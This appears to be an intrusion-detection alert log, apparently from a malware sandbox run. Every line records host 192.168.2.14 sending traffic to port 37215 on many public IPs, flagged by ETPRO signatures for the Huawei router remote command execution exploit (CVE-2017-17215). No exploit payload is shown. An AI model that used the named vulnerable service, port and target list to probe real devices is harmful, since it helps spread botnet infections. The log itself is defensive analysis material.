                                                    07/10/24-08:27:19.293782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4726437215192.168.2.14197.125.56.165
                                                    07/10/24-08:27:20.421693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3806237215192.168.2.1420.242.68.83
                                                    07/10/24-08:26:13.743815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5538837215192.168.2.14157.194.215.111
                                                    07/10/24-08:27:27.175137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266037215192.168.2.1441.108.198.253
                                                    07/10/24-08:26:43.680927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4625437215192.168.2.14199.185.163.230
                                                    07/10/24-08:26:13.850694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5185837215192.168.2.1441.128.69.103
                                                    07/10/24-08:26:22.299447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3464037215192.168.2.14207.230.121.245
                                                    07/10/24-08:26:25.512620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5469037215192.168.2.1441.195.86.203
                                                    07/10/24-08:26:53.147392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439437215192.168.2.1441.240.250.231
                                                    07/10/24-08:26:28.644111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5098637215192.168.2.1441.146.192.177
                                                    07/10/24-08:27:17.067488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5731237215192.168.2.14157.14.184.189
                                                    07/10/24-08:27:27.169986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3310637215192.168.2.1441.110.173.140
                                                    07/10/24-08:27:28.177795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5780237215192.168.2.1441.92.249.148
                                                    07/10/24-08:27:13.712614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727437215192.168.2.14197.75.171.73
                                                    07/10/24-08:26:59.657792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5679837215192.168.2.14197.232.50.165
                                                    07/10/24-08:26:52.082361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738837215192.168.2.14157.185.114.68
                                                    07/10/24-08:26:15.809769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3451037215192.168.2.14126.211.1.21
                                                    07/10/24-08:26:33.231891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3387237215192.168.2.1441.251.134.14
                                                    07/10/24-08:26:45.640337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3634037215192.168.2.1441.130.227.185
                                                    07/10/24-08:27:02.893845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197237215192.168.2.14197.123.133.11
                                                    07/10/24-08:26:43.752135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951437215192.168.2.1441.77.54.6
                                                    07/10/24-08:26:23.284945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5968437215192.168.2.1448.70.197.202
                                                    07/10/24-08:27:22.758279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4154637215192.168.2.14116.74.105.179
                                                    07/10/24-08:26:23.279248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5835237215192.168.2.14197.230.105.29
                                                    07/10/24-08:26:25.513767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4656837215192.168.2.14157.150.247.88
                                                    07/10/24-08:27:19.324879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022437215192.168.2.1441.7.227.18
                                                    07/10/24-08:26:18.002573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3331837215192.168.2.14197.96.75.2
                                                    07/10/24-08:26:52.009687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197837215192.168.2.1457.113.156.137
                                                    07/10/24-08:26:20.144044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118037215192.168.2.14197.108.124.112
                                                    07/10/24-08:27:05.133691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3458237215192.168.2.14197.123.216.177
                                                    07/10/24-08:26:13.654312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5722837215192.168.2.14130.143.57.173
                                                    07/10/24-08:27:19.211631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5943037215192.168.2.1441.101.100.14
                                                    07/10/24-08:26:14.826871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4220437215192.168.2.14197.9.152.82
                                                    07/10/24-08:26:48.008674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4909237215192.168.2.1441.87.150.215
                                                    07/10/24-08:26:14.775624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734037215192.168.2.1494.90.95.20
                                                    07/10/24-08:26:43.805226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4153637215192.168.2.14197.125.99.81
                                                    07/10/24-08:26:13.739832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3676837215192.168.2.14197.91.209.27
                                                    07/10/24-08:27:19.224533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4956437215192.168.2.14157.86.203.199
                                                    07/10/24-08:26:20.170023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5902037215192.168.2.14197.138.50.157
                                                    07/10/24-08:27:20.412870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5226637215192.168.2.14197.140.71.74
                                                    07/10/24-08:26:18.024186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4153637215192.168.2.1476.23.65.164
                                                    07/10/24-08:26:18.036814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3665837215192.168.2.1441.196.148.186
                                                    07/10/24-08:26:25.522450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4009437215192.168.2.14119.176.248.135
                                                    07/10/24-08:26:36.418082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834637215192.168.2.14197.103.230.240
                                                    07/10/24-08:26:33.179431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5791437215192.168.2.14157.20.23.26
                                                    07/10/24-08:26:26.565464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4756837215192.168.2.14157.17.177.197
                                                    07/10/24-08:26:55.356991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5751437215192.168.2.14197.109.53.100
                                                    07/10/24-08:26:38.648548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5065037215192.168.2.14197.240.10.150
                                                    07/10/24-08:27:31.468333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4034037215192.168.2.14157.3.90.69
                                                    07/10/24-08:26:15.809850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5086637215192.168.2.14157.249.91.54
                                                    07/10/24-08:27:14.667183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5993637215192.168.2.14197.76.74.25
                                                    07/10/24-08:26:33.251100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4249637215192.168.2.14157.77.55.52
                                                    07/10/24-08:26:28.851578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5621437215192.168.2.14197.222.13.218
                                                    07/10/24-08:26:43.849497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849437215192.168.2.1441.191.150.214
                                                    07/10/24-08:26:31.075999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5974637215192.168.2.14197.143.104.80
                                                    07/10/24-08:27:05.219455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5673437215192.168.2.14197.110.101.59
                                                    07/10/24-08:26:22.223907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754437215192.168.2.1480.124.171.151
                                                    07/10/24-08:26:14.814365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574437215192.168.2.14157.82.248.62
                                                    07/10/24-08:26:43.848073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5078837215192.168.2.14197.90.141.117
                                                    07/10/24-08:27:05.213994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4580037215192.168.2.14157.101.65.59
                                                    07/10/24-08:27:23.847677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4934037215192.168.2.14197.125.7.16
                                                    07/10/24-08:27:07.381447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4206637215192.168.2.1441.21.251.0
                                                    07/10/24-08:27:19.294251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5725437215192.168.2.14197.112.150.210
                                                    07/10/24-08:26:53.245548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4400237215192.168.2.14197.61.222.179
                                                    07/10/24-08:27:02.887848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4147637215192.168.2.14157.36.43.185
                                                    07/10/24-08:27:14.881343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5459637215192.168.2.1441.248.40.61
                                                    07/10/24-08:27:30.417770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5744237215192.168.2.1441.82.82.100
                                                    07/10/24-08:27:13.993743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5390237215192.168.2.1441.246.149.186
                                                    07/10/24-08:26:42.459051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4480837215192.168.2.14157.231.1.87
                                                    07/10/24-08:27:33.879703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6090837215192.168.2.14197.155.216.155
                                                    07/10/24-08:27:34.124417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4398037215192.168.2.14157.130.189.69
                                                    07/10/24-08:26:43.881228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5104237215192.168.2.1441.169.3.171
                                                    07/10/24-08:26:20.158539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3495037215192.168.2.1482.181.218.136
                                                    07/10/24-08:26:59.828074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5735437215192.168.2.1441.132.60.41
                                                    07/10/24-08:27:17.093550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4930037215192.168.2.1441.57.87.237
                                                    07/10/24-08:26:28.853108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4930437215192.168.2.14197.253.64.84
                                                    07/10/24-08:26:59.800330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5986837215192.168.2.14157.224.40.89
                                                    07/10/24-08:26:36.406451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4636037215192.168.2.14210.65.96.164
                                                    07/10/24-08:27:31.550771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3318037215192.168.2.14197.47.124.145
                                                    07/10/24-08:26:20.113907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4378637215192.168.2.14197.42.255.103
                                                    07/10/24-08:26:43.901338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4555037215192.168.2.1441.243.115.125
                                                    07/10/24-08:27:13.865761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5898637215192.168.2.1469.232.101.251
                                                    07/10/24-08:26:15.867590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6055437215192.168.2.1441.105.120.239
                                                    07/10/24-08:27:17.083690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422037215192.168.2.14157.16.41.99
                                                    07/10/24-08:26:59.683298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674237215192.168.2.14118.9.88.241
                                                    07/10/24-08:26:17.996521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5325237215192.168.2.14197.21.29.223
                                                    07/10/24-08:27:10.548037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4952037215192.168.2.14197.168.74.170
                                                    07/10/24-08:27:05.179313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4549037215192.168.2.14197.52.26.194
                                                    07/10/24-08:27:22.469991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3766837215192.168.2.1483.236.108.47
                                                    07/10/24-08:26:34.196006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495837215192.168.2.1493.23.34.164
                                                    07/10/24-08:26:13.830488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5991037215192.168.2.14157.208.30.141
                                                    07/10/24-08:26:36.381629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4718437215192.168.2.14157.254.18.22
                                                    07/10/24-08:26:43.825232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300637215192.168.2.1499.140.102.41
                                                    07/10/24-08:27:13.883458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5322837215192.168.2.14197.190.184.31
                                                    07/10/24-08:26:52.045134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6019637215192.168.2.1441.132.27.194
                                                    07/10/24-08:27:33.744457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804637215192.168.2.1441.126.125.121
                                                    07/10/24-08:26:18.002573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4010637215192.168.2.1441.220.66.4
                                                    07/10/24-08:26:38.599801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3596037215192.168.2.1441.7.81.221
                                                    07/10/24-08:26:29.887223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4072437215192.168.2.14157.216.217.220
                                                    07/10/24-08:26:28.808876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4070237215192.168.2.1474.105.149.99
                                                    07/10/24-08:26:53.207005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5860637215192.168.2.14197.212.217.137
                                                    07/10/24-08:26:23.299402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5509037215192.168.2.1441.60.172.193
                                                    07/10/24-08:26:13.759020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3469237215192.168.2.14157.0.207.158
                                                    07/10/24-08:26:43.833150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3332437215192.168.2.14194.179.104.145
                                                    07/10/24-08:26:55.415648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5525837215192.168.2.1499.44.140.37
                                                    07/10/24-08:26:52.008729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4206237215192.168.2.14131.155.47.60
                                                    07/10/24-08:26:18.011354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6044237215192.168.2.14155.22.74.61
                                                    07/10/24-08:26:23.268554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4492837215192.168.2.1441.160.223.46
                                                    07/10/24-08:26:23.314793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5624837215192.168.2.14197.141.175.130
                                                    07/10/24-08:27:17.022999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3638637215192.168.2.14197.74.227.79
                                                    07/10/24-08:26:41.490874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4101837215192.168.2.1471.233.161.79
                                                    07/10/24-08:26:43.681536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249037215192.168.2.14157.206.83.222
                                                    07/10/24-08:27:22.839204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5338637215192.168.2.14197.49.177.2
                                                    07/10/24-08:26:28.771249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338037215192.168.2.14157.187.186.58
                                                    07/10/24-08:26:28.821569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4473437215192.168.2.14197.203.146.184
                                                    07/10/24-08:26:33.175812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5892437215192.168.2.1437.244.202.183
                                                    07/10/24-08:27:05.227018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4189037215192.168.2.14197.197.240.93
                                                    07/10/24-08:26:38.586951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3880237215192.168.2.14197.136.66.202
                                                    07/10/24-08:26:25.461308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4158037215192.168.2.1441.71.125.234
                                                    07/10/24-08:26:41.407237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4857637215192.168.2.14197.92.125.207
                                                    07/10/24-08:26:43.721021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443637215192.168.2.1431.173.195.45
                                                    07/10/24-08:27:22.783603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5785437215192.168.2.1441.61.76.232
                                                    07/10/24-08:26:41.568062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3496637215192.168.2.14216.79.91.242
                                                    07/10/24-08:26:49.851941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4297637215192.168.2.14169.21.175.67
                                                    07/10/24-08:26:33.257964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5577037215192.168.2.14197.0.104.15
                                                    07/10/24-08:26:48.002361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5513637215192.168.2.14185.9.171.26
                                                    07/10/24-08:26:53.141329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009037215192.168.2.14197.41.38.126
                                                    07/10/24-08:26:53.198368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4859637215192.168.2.1441.20.24.83
                                                    07/10/24-08:26:41.560795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5542037215192.168.2.1441.176.100.194
                                                    07/10/24-08:26:59.861773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300637215192.168.2.14207.168.239.204
                                                    07/10/24-08:27:11.546125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544437215192.168.2.14197.73.152.242
                                                    07/10/24-08:26:49.910333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4183437215192.168.2.14197.150.93.239
                                                    07/10/24-08:26:28.766968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5545837215192.168.2.14197.75.9.44
                                                    07/10/24-08:26:34.248893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5205237215192.168.2.1441.129.231.69
                                                    07/10/24-08:26:41.281691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568637215192.168.2.14202.224.83.21
                                                    07/10/24-08:26:18.037758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4816637215192.168.2.1419.43.1.163
                                                    07/10/24-08:26:49.858364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4581237215192.168.2.1441.215.24.13
                                                    07/10/24-08:27:13.761850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200837215192.168.2.14197.240.154.24
                                                    07/10/24-08:26:41.525598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246437215192.168.2.14204.121.104.176
                                                    07/10/24-08:27:13.903981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4739037215192.168.2.14197.182.204.40
                                                    07/10/24-08:27:22.570409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593637215192.168.2.14157.179.64.138
                                                    07/10/24-08:26:13.747131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5171237215192.168.2.1441.186.79.210
                                                    07/10/24-08:26:28.651021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4306237215192.168.2.14197.59.79.74
                                                    07/10/24-08:26:23.356986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4198037215192.168.2.1441.136.42.166
                                                    07/10/24-08:26:28.795318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3441237215192.168.2.14157.48.116.152
                                                    07/10/24-08:26:11.598573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3767837215192.168.2.14197.159.115.4
                                                    07/10/24-08:27:14.831646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5164837215192.168.2.14197.42.87.16
                                                    07/10/24-08:26:52.015024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4721037215192.168.2.1441.32.184.236
                                                    07/10/24-08:26:22.260584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4938037215192.168.2.14157.29.140.23
                                                    07/10/24-08:26:22.213907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688037215192.168.2.14130.141.236.208
                                                    07/10/24-08:26:36.375796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4744837215192.168.2.14157.205.220.14
                                                    07/10/24-08:27:31.546205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4244237215192.168.2.1441.214.36.177
                                                    07/10/24-08:27:10.632992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5376637215192.168.2.14157.213.45.248
                                                    07/10/24-08:27:24.896247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3444637215192.168.2.14197.246.105.156
                                                    07/10/24-08:27:02.851731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309837215192.168.2.1441.78.48.213
                                                    07/10/24-08:26:33.239188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732637215192.168.2.14197.195.20.41
                                                    07/10/24-08:26:45.633588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5977437215192.168.2.14197.81.106.121
                                                    07/10/24-08:27:07.297213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5315037215192.168.2.1441.14.88.52
                                                    07/10/24-08:26:57.640182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5292437215192.168.2.14199.43.196.51
                                                    07/10/24-08:26:52.029476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5775637215192.168.2.14157.192.51.38
                                                    07/10/24-08:26:33.196369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4719637215192.168.2.14157.137.21.248
                                                    07/10/24-08:26:51.992041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3512437215192.168.2.14197.41.253.133
                                                    07/10/24-08:27:10.635784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762837215192.168.2.14157.160.214.118
                                                    07/10/24-08:26:57.521887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5551437215192.168.2.14211.73.177.221
                                                    07/10/24-08:26:15.792492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5987637215192.168.2.14157.244.150.48
                                                    07/10/24-08:26:29.872230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3979437215192.168.2.14157.177.188.112
                                                    07/10/24-08:26:34.196325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744837215192.168.2.14149.125.73.21
                                                    07/10/24-08:27:07.281765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4611437215192.168.2.14100.181.33.210
                                                    07/10/24-08:27:07.392725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5720237215192.168.2.14197.42.40.85
                                                    07/10/24-08:26:14.819309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3517837215192.168.2.1414.106.148.114
                                                    07/10/24-08:27:10.664170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4183037215192.168.2.14157.237.227.216
                                                    07/10/24-08:26:38.614287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913637215192.168.2.14157.98.102.131
                                                    07/10/24-08:26:47.789703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3669037215192.168.2.1475.161.162.225
                                                    07/10/24-08:26:28.761249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5247237215192.168.2.14197.135.34.97
                                                    07/10/24-08:26:36.358828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578037215192.168.2.14144.246.141.224
                                                    07/10/24-08:26:17.928888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4160037215192.168.2.14157.8.237.143
                                                    07/10/24-08:27:27.130427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5472237215192.168.2.14197.95.100.161
                                                    07/10/24-08:26:31.098508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4985637215192.168.2.14197.112.37.53
                                                    07/10/24-08:26:59.566054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5282237215192.168.2.14157.62.200.41
                                                    07/10/24-08:26:48.018095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5477437215192.168.2.1441.42.33.4
                                                    07/10/24-08:26:42.419623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3663237215192.168.2.1441.152.200.86
                                                    07/10/24-08:27:22.915722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5828837215192.168.2.14157.180.71.190
                                                    07/10/24-08:26:49.779389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152637215192.168.2.14157.89.167.221
                                                    07/10/24-08:26:17.969551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5730637215192.168.2.1441.76.108.16
                                                    07/10/24-08:26:55.332212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4094637215192.168.2.14191.97.141.31
                                                    07/10/24-08:26:59.711172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4164837215192.168.2.1441.16.109.134
